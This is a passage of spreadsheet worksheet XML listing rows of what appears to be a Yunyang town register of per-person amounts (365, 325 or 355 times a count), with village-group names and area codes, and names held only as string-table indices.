      <c r="C1316" s="24" t="str">
        <f>C1315</f>
        <v>小关九组</v>
      </c>
      <c r="D1316" s="23" t="s">
        <v>3549</v>
      </c>
      <c r="E1316" s="32" t="s">
        <v>3550</v>
      </c>
      <c r="F1316" s="24" t="str">
        <f>F1315</f>
        <v>4113210521</v>
      </c>
      <c r="G1316" s="24"/>
      <c r="H1316" s="24"/>
      <c r="I1316" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1316" s="24"/>
      <c r="K1316" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1317" customHeight="1" spans="1:11">
      <c r="A1317" s="23" t="s">
        <v>3551</v>
      </c>
      <c r="B1317" s="24" t="str">
        <f>B1316</f>
        <v>云阳镇</v>
      </c>
      <c r="C1317" s="24" t="str">
        <f>C1316</f>
        <v>小关九组</v>
      </c>
      <c r="D1317" s="23" t="s">
        <v>3552</v>
      </c>
      <c r="E1317" s="23" t="s">
        <v>3553</v>
      </c>
      <c r="F1317" s="24" t="str">
        <f>F1316</f>
        <v>4113210521</v>
      </c>
      <c r="G1317" s="24"/>
      <c r="H1317" s="24"/>
      <c r="I1317" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1317" s="24"/>
      <c r="K1317" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1318" customHeight="1" spans="1:11">
      <c r="A1318" s="23" t="s">
        <v>3554</v>
      </c>
      <c r="B1318" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1318" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1318" s="24" t="s">
        <v>3556</v>
      </c>
      <c r="E1318" s="24" t="s">
        <v>3557</v>
      </c>
      <c r="F1318" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1318" s="24">
        <v>1</v>
      </c>
      <c r="H1318" s="25">
        <v>365</v>
      </c>
      <c r="I1318" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1318" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1318" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1319" customHeight="1" spans="1:11">
      <c r="A1319" s="23" t="s">
        <v>3558</v>
      </c>
      <c r="B1319" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1319" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1319" s="24" t="s">
        <v>3559</v>
      </c>
      <c r="E1319" s="24" t="s">
        <v>1312</v>
      </c>
      <c r="F1319" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1319" s="24">
        <v>2</v>
      </c>
      <c r="H1319" s="25">
        <v>325</v>
      </c>
      <c r="I1319" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1319" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1319" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1320" customHeight="1" spans="1:11">
      <c r="A1320" s="23" t="s">
        <v>3560</v>
      </c>
      <c r="B1320" s="24" t="str">
        <f>B1319</f>
        <v>云阳镇</v>
      </c>
      <c r="C1320" s="24" t="str">
        <f>C1319</f>
        <v>小关四组</v>
      </c>
      <c r="D1320" s="23" t="s">
        <v>3561</v>
      </c>
      <c r="E1320" s="23" t="s">
        <v>3562</v>
      </c>
      <c r="F1320" s="24" t="str">
        <f>F1319</f>
        <v>4113210521</v>
      </c>
      <c r="G1320" s="24"/>
      <c r="H1320" s="24"/>
      <c r="I1320" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1320" s="24"/>
      <c r="K1320" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1321" customHeight="1" spans="1:11">
      <c r="A1321" s="23" t="s">
        <v>3563</v>
      </c>
      <c r="B1321" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1321" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1321" s="24" t="s">
        <v>3565</v>
      </c>
      <c r="E1321" s="24" t="s">
        <v>3566</v>
      </c>
      <c r="F1321" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1321" s="24">
        <v>1</v>
      </c>
      <c r="H1321" s="25">
        <v>365</v>
      </c>
      <c r="I1321" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1321" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1321" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1322" customHeight="1" spans="1:11">
      <c r="A1322" s="23" t="s">
        <v>3568</v>
      </c>
      <c r="B1322" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1322" s="24" t="s">
        <v>3569</v>
      </c>
      <c r="D1322" s="24" t="s">
        <v>3570</v>
      </c>
      <c r="E1322" s="24" t="s">
        <v>3571</v>
      </c>
      <c r="F1322" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1322" s="24">
        <v>1</v>
      </c>
      <c r="H1322" s="25">
        <v>365</v>
      </c>
      <c r="I1322" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1322" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1322" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1323" customHeight="1" spans="1:11">
      <c r="A1323" s="23" t="s">
        <v>3572</v>
      </c>
      <c r="B1323" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1323" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1323" s="24" t="s">
        <v>3574</v>
      </c>
      <c r="E1323" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1323" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1323" s="24">
        <v>1</v>
      </c>
      <c r="H1323" s="25">
        <v>365</v>
      </c>
      <c r="I1323" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1323" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1323" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1324" customHeight="1" spans="1:11">
      <c r="A1324" s="23" t="s">
        <v>3577</v>
      </c>
      <c r="B1324" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1324" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1324" s="24" t="s">
        <v>3579</v>
      </c>
      <c r="E1324" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1324" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1324" s="24">
        <v>1</v>
      </c>
      <c r="H1324" s="25">
        <v>365</v>
      </c>
      <c r="I1324" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1324" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1324" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1325" customHeight="1" spans="1:11">
      <c r="A1325" s="23" t="s">
        <v>3582</v>
      </c>
      <c r="B1325" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1325" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1325" s="24" t="s">
        <v>3583</v>
      </c>
      <c r="E1325" s="24" t="s">
        <v>3584</v>
      </c>
      <c r="F1325" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1325" s="24">
        <v>2</v>
      </c>
      <c r="H1325" s="25">
        <v>325</v>
      </c>
      <c r="I1325" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1325" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1325" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1326" customHeight="1" spans="1:11">
      <c r="A1326" s="23" t="s">
        <v>3585</v>
      </c>
      <c r="B1326" s="24" t="str">
        <f>B1325</f>
        <v>云阳镇</v>
      </c>
      <c r="C1326" s="24" t="str">
        <f>C1325</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1326" s="23" t="s">
        <v>3586</v>
      </c>
      <c r="E1326" s="23" t="s">
        <v>3587</v>
      </c>
      <c r="F1326" s="24" t="str">
        <f>F1325</f>
        <v>4113210519</v>
      </c>
      <c r="G1326" s="24"/>
      <c r="H1326" s="24"/>
      <c r="I1326" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1326" s="24"/>
      <c r="K1326" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1327" customHeight="1" spans="1:11">
      <c r="A1327" s="23" t="s">
        <v>3588</v>
      </c>
      <c r="B1327" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1327" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1327" s="24" t="s">
        <v>3590</v>
      </c>
      <c r="E1327" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1327" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1327" s="24">
        <v>1</v>
      </c>
      <c r="H1327" s="25">
        <v>365</v>
      </c>
      <c r="I1327" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1327" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1327" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1328" customHeight="1" spans="1:11">
      <c r="A1328" s="23" t="s">
        <v>3591</v>
      </c>
      <c r="B1328" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1328" s="24" t="s">
        <v>3592</v>
      </c>
      <c r="D1328" s="24" t="s">
        <v>3593</v>
      </c>
      <c r="E1328" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1328" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1328" s="24">
        <v>1</v>
      </c>
      <c r="H1328" s="25">
        <v>365</v>
      </c>
      <c r="I1328" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1328" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1328" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1329" customHeight="1" spans="1:11">
      <c r="A1329" s="23" t="s">
        <v>3595</v>
      </c>
      <c r="B1329" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1329" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1329" s="24" t="s">
        <v>3597</v>
      </c>
      <c r="E1329" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1329" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1329" s="24">
        <v>1</v>
      </c>
      <c r="H1329" s="25">
        <v>365</v>
      </c>
      <c r="I1329" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1329" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1329" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1330" customHeight="1" spans="1:11">
      <c r="A1330" s="23" t="s">
        <v>3599</v>
      </c>
      <c r="B1330" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1330" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1330" s="24" t="s">
        <v>3600</v>
      </c>
      <c r="E1330" s="24" t="s">
        <v>3601</v>
      </c>
      <c r="F1330" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1330" s="24">
        <v>1</v>
      </c>
      <c r="H1330" s="25">
        <v>365</v>
      </c>
      <c r="I1330" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1330" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1330" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1331" customHeight="1" spans="1:11">
      <c r="A1331" s="23" t="s">
        <v>3602</v>
      </c>
      <c r="B1331" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1331" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1331" s="24" t="s">
        <v>3603</v>
      </c>
      <c r="E1331" s="24" t="s">
        <v>3604</v>
      </c>
      <c r="F1331" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1331" s="24">
        <v>1</v>
      </c>
      <c r="H1331" s="25">
        <v>365</v>
      </c>
      <c r="I1331" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1331" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1331" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1332" customHeight="1" spans="1:11">
      <c r="A1332" s="23" t="s">
        <v>3605</v>
      </c>
      <c r="B1332" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1332" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1332" s="24" t="s">
        <v>3606</v>
      </c>
      <c r="E1332" s="24" t="s">
        <v>3607</v>
      </c>
      <c r="F1332" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1332" s="24">
        <v>2</v>
      </c>
      <c r="H1332" s="25">
        <v>325</v>
      </c>
      <c r="I1332" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1332" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1332" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1333" customHeight="1" spans="1:11">
      <c r="A1333" s="23" t="s">
        <v>3608</v>
      </c>
      <c r="B1333" s="24" t="str">
        <f>B1332</f>
        <v>云阳镇</v>
      </c>
      <c r="C1333" s="24" t="str">
        <f>C1332</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1333" s="23" t="s">
        <v>3609</v>
      </c>
      <c r="E1333" s="23" t="s">
        <v>2566</v>
      </c>
      <c r="F1333" s="24" t="str">
        <f>F1332</f>
        <v>4113210519</v>
      </c>
      <c r="G1333" s="24"/>
      <c r="H1333" s="24"/>
      <c r="I1333" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1333" s="24"/>
      <c r="K1333" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1334" customHeight="1" spans="1:11">
      <c r="A1334" s="23" t="s">
        <v>3610</v>
      </c>
      <c r="B1334" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1334" s="24" t="s">
        <v>3611</v>
      </c>
      <c r="D1334" s="24" t="s">
        <v>3612</v>
      </c>
      <c r="E1334" s="24" t="s">
        <v>3613</v>
      </c>
      <c r="F1334" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1334" s="24">
        <v>1</v>
      </c>
      <c r="H1334" s="25">
        <v>365</v>
      </c>
      <c r="I1334" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1334" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1334" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1335" customHeight="1" spans="1:11">
      <c r="A1335" s="23" t="s">
        <v>3614</v>
      </c>
      <c r="B1335" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1335" s="24" t="s">
        <v>3615</v>
      </c>
      <c r="D1335" s="24" t="s">
        <v>3616</v>
      </c>
      <c r="E1335" s="24" t="s">
        <v>3617</v>
      </c>
      <c r="F1335" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1335" s="24">
        <v>1</v>
      </c>
      <c r="H1335" s="25">
        <v>365</v>
      </c>
      <c r="I1335" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1335" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1335" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1336" customHeight="1" spans="1:11">
      <c r="A1336" s="23" t="s">
        <v>3618</v>
      </c>
      <c r="B1336" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1336" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1336" s="24" t="s">
        <v>3619</v>
      </c>
      <c r="E1336" s="24" t="s">
        <v>3620</v>
      </c>
      <c r="F1336" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1336" s="24">
        <v>2</v>
      </c>
      <c r="H1336" s="25">
        <v>355</v>
      </c>
      <c r="I1336" s="24">
        <f t="shared" si="20"/>
        <v>710</v>
      </c>
      <c r="J1336" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1336" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1337" customHeight="1" spans="1:11">
      <c r="A1337" s="23" t="s">
        <v>3621</v>
      </c>
      <c r="B1337" s="24" t="str">
        <f>B1336</f>
        <v>云阳镇</v>
      </c>
      <c r="C1337" s="24" t="str">
        <f>C1336</f>
        <v>大关一组</v>
      </c>
      <c r="D1337" s="23" t="s">
        <v>3622</v>
      </c>
      <c r="E1337" s="23" t="s">
        <v>3623</v>
      </c>
      <c r="F1337" s="24" t="str">
        <f>F1336</f>
        <v>4113210522</v>
      </c>
      <c r="G1337" s="24"/>
      <c r="H1337" s="24"/>
      <c r="I1337" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1337" s="24"/>
      <c r="K1337" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1338" customHeight="1" spans="1:11">
      <c r="A1338" s="23" t="s">
        <v>3624</v>
      </c>
      <c r="B1338" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1338" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1338" s="24" t="s">
        <v>3625</v>
      </c>
      <c r="E1338" s="24" t="s">
        <v>3626</v>
      </c>
      <c r="F1338" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1338" s="24">
        <v>1</v>
      </c>
      <c r="H1338" s="25">
        <v>365</v>
      </c>
      <c r="I1338" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1338" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1338" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1339" customHeight="1" spans="1:11">
      <c r="A1339" s="23" t="s">
        <v>3627</v>
      </c>
      <c r="B1339" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1339" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1339" s="24" t="s">
        <v>3628</v>
      </c>
      <c r="E1339" s="24" t="s">
        <v>3493</v>
      </c>
      <c r="F1339" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1339" s="24">
        <v>1</v>
      </c>
      <c r="H1339" s="25">
        <v>365</v>
      </c>
      <c r="I1339" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1339" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1339" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1340" customHeight="1" spans="1:11">
      <c r="A1340" s="23" t="s">
        <v>3629</v>
      </c>
      <c r="B1340" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1340" s="24" t="s">
        <v>3611</v>
      </c>
      <c r="D1340" s="24" t="s">
        <v>3630</v>
      </c>
      <c r="E1340" s="24" t="s">
        <v>3631</v>
      </c>
      <c r="F1340" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1340" s="24">
        <v>1</v>
      </c>
      <c r="H1340" s="25">
        <v>365</v>
      </c>
      <c r="I1340" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1340" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1340" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1341" customHeight="1" spans="1:11">
      <c r="A1341" s="23" t="s">
        <v>3632</v>
      </c>
      <c r="B1341" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1341" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1341" s="24" t="s">
        <v>3633</v>
      </c>
      <c r="E1341" s="24" t="s">
        <v>3634</v>
      </c>
      <c r="F1341" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1341" s="24">
        <v>1</v>
      </c>
      <c r="H1341" s="25">
        <v>365</v>
      </c>
      <c r="I1341" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1341" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1341" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1342" customHeight="1" spans="1:11">
      <c r="A1342" s="23" t="s">
        <v>3635</v>
      </c>
      <c r="B1342" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1342" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1342" s="24" t="s">
        <v>3636</v>
      </c>
      <c r="E1342" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1342" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1342" s="24">
        <v>1</v>
      </c>
      <c r="H1342" s="25">
        <v>365</v>
      </c>
      <c r="I1342" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1342" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1342" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1343" customHeight="1" spans="1:11">
      <c r="A1343" s="23" t="s">
        <v>3638</v>
      </c>
      <c r="B1343" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1343" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1343" s="24" t="s">
        <v>3640</v>
      </c>
      <c r="E1343" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1343" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1343" s="24">
        <v>2</v>
      </c>
      <c r="H1343" s="25">
        <v>325</v>
      </c>
      <c r="I1343" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1343" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1343" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1344" customHeight="1" spans="1:11">
      <c r="A1344" s="23" t="s">
        <v>3642</v>
      </c>
      <c r="B1344" s="24" t="str">
        <f>B1343</f>
        <v>云阳镇</v>
      </c>
      <c r="C1344" s="24" t="str">
        <f>C1343</f>
        <v>南召店南头</v>
      </c>
      <c r="D1344" s="23" t="s">
        <v>3643</v>
      </c>
      <c r="E1344" s="23" t="s">
        <v>3644</v>
      </c>
      <c r="F1344" s="24" t="str">
        <f>F1343</f>
        <v>4113210519</v>
      </c>
      <c r="G1344" s="24"/>
      <c r="H1344" s="24"/>
      <c r="I1344" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1344" s="24"/>
      <c r="K1344" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1345" customHeight="1" spans="1:11">
      <c r="A1345" s="23" t="s">
        <v>3645</v>
      </c>
      <c r="B1345" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1345" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1345" s="24" t="s">
        <v>3646</v>
      </c>
      <c r="E1345" s="24" t="s">
        <v>3647</v>
      </c>
      <c r="F1345" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1345" s="24">
        <v>1</v>
      </c>
      <c r="H1345" s="25">
        <v>365</v>
      </c>
      <c r="I1345" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1345" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1345" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1346" customHeight="1" spans="1:11">
      <c r="A1346" s="23" t="s">
        <v>3648</v>
      </c>
      <c r="B1346" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1346" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1346" s="24" t="s">
        <v>3649</v>
      </c>
      <c r="E1346" s="24" t="s">
        <v>3584</v>
      </c>
      <c r="F1346" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1346" s="24">
        <v>1</v>
      </c>
      <c r="H1346" s="25">
        <v>365</v>
      </c>
      <c r="I1346" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1346" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1346" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1347" customHeight="1" spans="1:11">
      <c r="A1347" s="23" t="s">
        <v>3650</v>
      </c>
      <c r="B1347" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1347" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1347" s="24" t="s">
        <v>3651</v>
      </c>
      <c r="E1347" s="24" t="s">
        <v>3641</v>
      </c>
      <c r="F1347" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1347" s="24">
        <v>1</v>
      </c>
      <c r="H1347" s="25">
        <v>365</v>
      </c>
      <c r="I1347" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1347" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1347" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1348" customHeight="1" spans="1:11">
      <c r="A1348" s="23" t="s">
        <v>3652</v>
      </c>
      <c r="B1348" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1348" s="24" t="s">
        <v>3653</v>
      </c>
      <c r="D1348" s="24" t="s">
        <v>3654</v>
      </c>
      <c r="E1348" s="24" t="s">
        <v>3655</v>
      </c>
      <c r="F1348" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1348" s="24">
        <v>1</v>
      </c>
      <c r="H1348" s="25">
        <v>365</v>
      </c>
      <c r="I1348" s="24">
        <f t="shared" ref="I1348:I1411" si="21">H1348*G1348</f>
        <v>365</v>
      </c>
      <c r="J1348" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1348" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1349" customHeight="1" spans="1:11">
      <c r="A1349" s="23" t="s">
        <v>3657</v>
      </c>
      <c r="B1349" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1349" s="24" t="s">
        <v>3658</v>
      </c>
      <c r="D1349" s="24" t="s">
        <v>3659</v>
      </c>
      <c r="E1349" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1349" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1349" s="24">
        <v>1</v>
      </c>
      <c r="H1349" s="25">
        <v>365</v>
      </c>
      <c r="I1349" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1349" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1349" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1350" customHeight="1" spans="1:11">
      <c r="A1350" s="23" t="s">
        <v>3660</v>
      </c>
      <c r="B1350" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1350" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1350" s="24" t="s">
        <v>3661</v>
      </c>
      <c r="E1350" s="24" t="s">
        <v>3662</v>
      </c>
      <c r="F1350" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1350" s="24">
        <v>1</v>
      </c>
      <c r="H1350" s="25">
        <v>365</v>
      </c>
      <c r="I1350" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1350" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1350" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1351" customHeight="1" spans="1:11">
      <c r="A1351" s="23" t="s">
        <v>3663</v>
      </c>
      <c r="B1351" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1351" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1351" s="24" t="s">
        <v>3664</v>
      </c>
      <c r="E1351" s="24" t="s">
        <v>3631</v>
      </c>
      <c r="F1351" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1351" s="24">
        <v>2</v>
      </c>
      <c r="H1351" s="25">
        <v>325</v>
      </c>
      <c r="I1351" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1351" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1351" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1352" customHeight="1" spans="1:11">
      <c r="A1352" s="23" t="s">
        <v>3665</v>
      </c>
      <c r="B1352" s="24" t="str">
        <f>B1351</f>
        <v>云阳镇</v>
      </c>
      <c r="C1352" s="24" t="str">
        <f>C1351</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1352" s="23" t="s">
        <v>3666</v>
      </c>
      <c r="E1352" s="23" t="s">
        <v>3594</v>
      </c>
      <c r="F1352" s="24" t="str">
        <f>F1351</f>
        <v>4113210519</v>
      </c>
      <c r="G1352" s="24"/>
      <c r="H1352" s="24"/>
      <c r="I1352" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1352" s="24"/>
      <c r="K1352" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1353" customHeight="1" spans="1:11">
      <c r="A1353" s="23" t="s">
        <v>3667</v>
      </c>
      <c r="B1353" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1353" s="24" t="s">
        <v>3668</v>
      </c>
      <c r="D1353" s="24" t="s">
        <v>3669</v>
      </c>
      <c r="E1353" s="24" t="s">
        <v>3670</v>
      </c>
      <c r="F1353" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1353" s="24">
        <v>1</v>
      </c>
      <c r="H1353" s="25">
        <v>365</v>
      </c>
      <c r="I1353" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1353" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1353" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1354" customHeight="1" spans="1:11">
      <c r="A1354" s="23" t="s">
        <v>3671</v>
      </c>
      <c r="B1354" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1354" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1354" s="24" t="s">
        <v>3672</v>
      </c>
      <c r="E1354" s="24" t="s">
        <v>3673</v>
      </c>
      <c r="F1354" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1354" s="24">
        <v>1</v>
      </c>
      <c r="H1354" s="25">
        <v>365</v>
      </c>
      <c r="I1354" s="24">
